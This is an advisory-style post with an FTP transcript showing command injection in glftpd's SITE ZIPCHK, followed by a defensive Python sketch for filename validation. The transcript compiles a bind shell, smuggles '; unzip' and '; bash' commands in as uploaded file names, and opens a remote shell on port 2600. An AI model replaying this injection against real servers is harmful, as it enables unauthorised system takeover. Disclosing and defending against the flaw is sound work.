
003_wp.txt

Posted Dec 24, 1999
Authored by Suid | Site suid.kg

Example attack transcript against glftpd. This attack was performed against a default install with a single user account added.

SHA-256 | 70d7d889b43a2d66d151613a1294339e52ec80d676fc66dba686150ebe3bc64f

suid@suid.kg. 

This attack was performed against a default install of glftpd with a single user account added.
This attack was authorised (by me against me)

$ ftp
ftp> open ftp.target.com
Connected to 10.0.0.1.
220 GO AWAY
Name (ftp.target.com:suid): suid
331 Password required for suid.
Password:
230 User suid logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd Request
250- --NEWS--
250-
250- New Feature: Login with (!)Username to kill ghost connections.
250-
250-
250- --=- Type SITE HELP for a list of special SITE commands -=--
250-
250-
250- ._____________________________________________________________________
250- | _ / _ / _ / _ / _____/____ ____/ ____/
250- | /_____/ /____/ / / /____/_____ / / / /____ /
250- |____| ._______ /____ /_______ /_______/ /__/ /_______/
250- .-=-------------------- /____/ ---------------------------------------=-.
250- `-=-------------------------------------------------------------------=-'
250- `-----( Type 'site request title' to make a request )-----'
250- .-===================================================================-.
250- | Directory and Race Info for ./Request |
250- |-===================================================================-|
250- | Uploader | Number of Files | Total Size (Bytes) | % of Upload |
250- |-===================================================================-|
250- | 1.glftpd | 5 | 1,189,325 | 100.0% |
250- |______________|_________________|____________________|_______________|
250- | Total : 01 | 5 | 1,189,325 | 100.0% |
250- `-===================================================================-'
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 0
226 [Ul:0.0MB][Dl:0.0MB][Credits:14.6MB][Speed:0.00K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp
$ gcc ~/bindshell.c -o b -static
$ cat > blah
#!/bin/bash
./b &
^D
$ chmod a+rx b blah
$ zip blah.zip b blah
adding: b (deflated 70%)
adding: blah (stored 0%)
$ > " ; unzip blah.zip;"
$ > " ; bash blah;"
$ fg
ftp (wd: ~)
ftp> put blah.zip
local: blah.zip remote: blah.zip
200 PORT command successful.
150 Opening BINARY mode data connection for blah.zip.
226- Checking file integrity...
226- PASSED. Extracting FILE_ID.DIZ...
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:2770.37K/s][Free:2914MB]
274946 bytes sent in 0.0801 secs (3.4e+03 Kbytes/sec)
ftp> put " ; bash blah;"
local: ; bash blah; remote: ; bash blah;
200 PORT command successful.
150 Opening BINARY mode data connection for ; bash blah;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> put " ; unzip blah.zip;"
local: ; unzip blah.zip; remote: ; unzip blah.zip;
200 PORT command successful.
150 Opening BINARY mode data connection for ; unzip blah.zip;.
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:0.00K/s][Free:2914MB]
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:04 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_bash_blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 _;_unzip_blah.zip;
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:51.94K/s][Free:2914MB]
ftp> rename "_;_unzip_blah.zip;" " ; unzip blah.zip;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> rename "_;_bash_blah;" " ; bash blah;"
350 File exists, ready for destination name
250 RNTO command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 542
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:54.32K/s][Free:2914MB]
ftp> quote site zipchk " ; unzip blah.zip;"
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
Archive: blah.zip
ftp> ls
inflating: b
ftp> ls
extracting: blah
ftp> ls
200- File ; unzip blah.zip; FAILED zipcheck.
200-
200 Command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
200 PORT command successful.
ftp> ls -la
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2329
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:46.36K/s][Free:2914MB]
ftp> quote site zipchk " ; bash blah;"
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:74.83K/s][Free:2914MB]
200 PORT command successful.
ftp> ls
150 Opening ASCII mode data connection for directory listing.
ftp> ls
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:71.87K/s][Free:2914MB]
unzip: can't find /site/Request/, /site/Request/.zip or /site/Request/.ZIP, so there.
ftp> ls
200- File ; bash blah; FAILED zipcheck.
200-
200 Command successful.
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for directory listing.
total 2325
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
226 [Ul:0.3MB][Dl:0.0MB][Credits:15.4MB][Speed:52.23K/s][Free:2914MB]
ftp> ^Z
[1]+ Stopped ftp (wd: ~)
$ telnet ftp.target.com 2600
Trying 10.0.0.1...
Connected to ftp.target.com.
Escape character is '^]'.
/bin/bash -i;
[suidl@ftp ~]$ ls -la
total 1173
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;
-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;
drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .
drwxrwxrwx 3 glftpd glftpd 1024 Dec 22 05:57 ..
-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message
-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b
-rwxr-xr-x 1 suid NoGroup 18 Dec 23 00:02 blah
-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip
[suid@ftp ~]$
[suid@ftp ~]$ exit
....
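
Added example, not part of the original transcript and not glftpd code: the output above is consistent with SITE ZIPCHK pasting a client-chosen file name into a shell command line, and it shows RNTO accepting names with spaces that the upload itself had stored with underscores. The sketch below applies one allow-list to every name, builds the archive test as an argument list with no shell, and flags listing entries that fail the check; the allow-list policy, the `unzip -tqq` invocation and all function names are assumptions made for illustration.

```python
import re

# Allow-list for client-supplied names (an assumed policy for this example):
# letters, digits, '.', '_' and '-', not starting with '-'.
SAFE_NAME = re.compile(r"(?!-)[A-Za-z0-9._-]{1,255}")

# One `ls -l` line: mode, links, owner, group, size, month, day, time, name.
LS_LINE = re.compile(
    r"^[-dlbcps]\S{9}\s+\d+\s+\S+\s+\S+\s+\d+\s+\w{3}\s+\d+\s+[\d:]+\s(.*)$")

# Constructed sample: listing lines copied from the transcript above.
SAMPLE_LISTING = [
    "-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; bash blah;",
    "-rw-r--r-- 1 suid NoGroup 0 Dec 23 00:04 ; unzip blah.zip;",
    "drwxrwxrwx 2 glftpd glftpd 1024 Dec 23 00:05 .",
    "-rw-rw-rw- 1 glftpd glftpd 0 Dec 23 00:04 .message",
    "-rwxr-xr-x 1 suid NoGroup 914359 Dec 23 00:01 b",
    "-rw-r--r-- 1 suid NoGroup 274946 Dec 23 00:04 blah.zip",
]

def is_safe_name(name):
    """True if the name passes the allow-list and is not '.' or '..'."""
    return name not in (".", "..") and SAFE_NAME.fullmatch(name) is not None

def zip_test_argv(site_dir, name):
    """Argv for an archive integrity test, for an exec-style call with no shell.

    Each list element reaches unzip as exactly one argument, so a space or
    ';' in a name cannot start a second command.
    """
    if not is_safe_name(name):
        raise ValueError("rejected file name: %r" % name)
    return ["unzip", "-tqq", site_dir.rstrip("/") + "/" + name]

def flag_listing(lines):
    """Return names in `ls -l` output that fail the allow-list."""
    flagged = []
    for line in lines:
        m = LS_LINE.match(line)
        if m and m.group(1) not in (".", "..") and not is_safe_name(m.group(1)):
            flagged.append(m.group(1))
    return flagged

if __name__ == "__main__":
    print(zip_test_argv("/site/Request", "blah.zip"))
    for name in flag_listing(SAMPLE_LISTING):
        print("suspicious name:", repr(name))
```

The same `is_safe_name` check belongs on every command that creates or changes a name (upload, rename, directory creation), since the transcript shows the rename path bypassing the substitution applied at upload time.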